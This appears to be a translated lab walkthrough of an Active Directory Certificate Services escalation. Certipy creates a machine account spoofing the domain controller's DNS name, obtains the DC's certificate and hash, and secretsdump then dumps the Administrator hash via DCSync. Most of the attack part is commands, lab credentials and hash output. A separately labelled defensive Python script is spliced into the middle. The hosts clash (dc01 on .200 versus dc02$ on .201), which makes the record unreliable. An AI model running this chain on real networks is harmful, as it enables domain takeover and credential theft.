Environment setup
Configure ADCS by following this article: https://zhuanlan.zhihu.com/p/526293326
![image.png](https://img.tucang.cc/api/image/show/2c6c05204ec8020f29dba154fe474581)
Configure it after the installation finishes.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/26429680/1704851082579-eb133206-9a3c-4c8b-b2fb-1332546368b7.png#averageHue=%23d6cec6&clientId=ub110e0c5-701f-4&from=paste&id=ud2ea3634&originHeight=922&originWidth=1362&originalType=url&ratio=2&rotation=0&showTitle=false&size=384360&status=done&style=none&taskId=ubf131b65-91d9-435e-bc7e-ae80325a964&title=)
Once the domain controller and Active Directory Certificate Services roles are installed, open "Active Directory Administrative Center" from the Tools menu on the Server Manager dashboard, then create a new user account under the Users container, set a password and tick "Password never expires". This account simulates an ordinary domain user.
![image.png](https://img.tucang.cc/api/image/show/b9c00f00a98f70154f50aaabc4d063ed)
Create a user: testacc/Cxk@123
![image.png](https://cdn.nlark.com/yuque/0/2024/png/26429680/1704851083026-bf8e53cc-3da0-487c-9a15-0f64eda09f2e.png#averageHue=%23f6f6f6&clientId=ub110e0c5-701f-4&from=paste&id=u2ec855e4&originHeight=788&originWidth=1154&originalType=url&ratio=2&rotation=0&showTitle=false&size=459196&status=done&style=none&taskId=u97a1233e-9b12-4d4f-bded-fd4acd004cd&title=)
Log in to a domain-joined machine.
Locating the CA from inside the domain

```
certutil -config - -ping
certutil -dump -v
```
![image.png](https://img.tucang.cc/api/image/show/932bcbb8d7560915f20c0c94b42bab73)
Server: DC01.ust4.fun
Issuing CA: ust4-DC01-CA
Locating the CA from outside the domain

```
certipy find -u [email protected] -p 'Cxk@123' -dc-ip 192.168.214.200 -scheme ldap -stdout
```
![image.png](https://img.tucang.cc/api/image/show/6323d54e864889cef56be92d89d33041)
Create a machine account

```
certipy account create -u [email protected] -p 'Cxk@123' -dc-ip 192.168.214.200 -user user1 -pass 'Aa@123' -dns 'dc01.ust4.fun'
```
![image.png](https://img.tucang.cc/api/image/show/03ed3c8bb25c6d88f509b07f657b8f57)
Use the newly created machine account to request a certificate from the Machine template

```
certipy req -u user1$ -p 'Aa@123' -template Machine -target 192.168.214.200 -ca ust4-DC01-CA -debug
```
![image.png](https://img.tucang.cc/api/image/show/00479bbed8ad1cfbe89e41bd54102988)
This yields the domain controller's certificate, dc01.pfx
![image.png](https://img.tucang.cc/api/image/show/b0b97ad01588dbfaf528a5b0a0d11cea)
Use the certificate to obtain the hash

```
certipy auth -pfx dc01.pfx -dc-ip 192.168.214.200 -debug
```
![image.png](https://img.tucang.cc/api/image/show/6630abd4850d5f1b4ea717eedd16f41e)
```
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:c3391d36932d66ad79ffc2bc117c17fa
```
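A defender-side check for the steps above (an added example, not code from the original post): the certificate request relies on a freshly created machine account whose dNSHostName points at the DC. The script below flags machine accounts whose dNSHostName does not match their own name, and host names claimed by more than one account; the account records are constructed inline in place of an LDAP query, and the domain name is taken from this post.

```python
# Added example, not code from the original post. Flags machine accounts whose
# dNSHostName does not match the host name implied by their sAMAccountName, and
# host names claimed by more than one account. Input is a constructed record list.
from collections import defaultdict

DOMAIN = "ust4.fun"  # domain used in the post


def expected_fqdn(sam_account_name: str, domain: str = DOMAIN) -> str:
    """Host name a machine account should carry: <name without $>.<domain>."""
    return f"{sam_account_name.rstrip('$').lower()}.{domain.lower()}"


def find_suspicious(accounts: list[dict], domain: str = DOMAIN) -> list[tuple[str, str]]:
    """Return (sAMAccountName, reason) for each machine account that looks wrong.

    accounts: dicts with keys sAMAccountName and dNSHostName (None if unset).
    """
    findings: list[tuple[str, str]] = []
    claims: dict[str, list[str]] = defaultdict(list)  # dNSHostName -> accounts
    for acct in accounts:
        sam = acct["sAMAccountName"]
        if not sam.endswith("$"):
            continue  # user accounts are out of scope
        dns = acct.get("dNSHostName")
        if not dns:
            continue
        dns = dns.lower()
        claims[dns].append(sam)
        want = expected_fqdn(sam, domain)
        if dns != want:
            findings.append((sam, f"dNSHostName {dns} does not match expected {want}"))
    for dns, owners in claims.items():
        if len(owners) > 1:  # two accounts claiming the same host is a strong signal
            for sam in owners:
                others = sorted(set(owners) - {sam})
                findings.append((sam, f"dNSHostName {dns} is also claimed by {others}"))
    return findings


# Constructed sample: two legitimate computers and the account created above.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DC01$", "dNSHostName": "DC01.ust4.fun"},
    {"sAMAccountName": "WS01$", "dNSHostName": "ws01.ust4.fun"},
    {"sAMAccountName": "USER1$", "dNSHostName": "dc01.ust4.fun"},
    {"sAMAccountName": "testacc", "dNSHostName": None},
]

if __name__ == "__main__":
    for sam, reason in find_suspicious(SAMPLE_ACCOUNTS):
        print(f"{sam}: {reason}")
```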
Use the hash for lateral movement
dcsync

```
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:c3391d36932d66ad79ffc2bc117c17fa ust4.fun/'dc02$'@192.168.214.201
```
Lateral movement to [email protected]
![image.png](https://img.tucang.cc/api/image/show/4c435976b1e324b372857dc722f750bd)
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:214114172ade9bb8d8feca6d765e0cf9:::
```
![image.png](https://img.tucang.cc/api/image/show/a2b2dd1b2aeb563ed5bb128be22a79ef)
![image.png](https://img.tucang.cc/api/image/show/ab5494697ce6bd997c0be35f0e4def3e)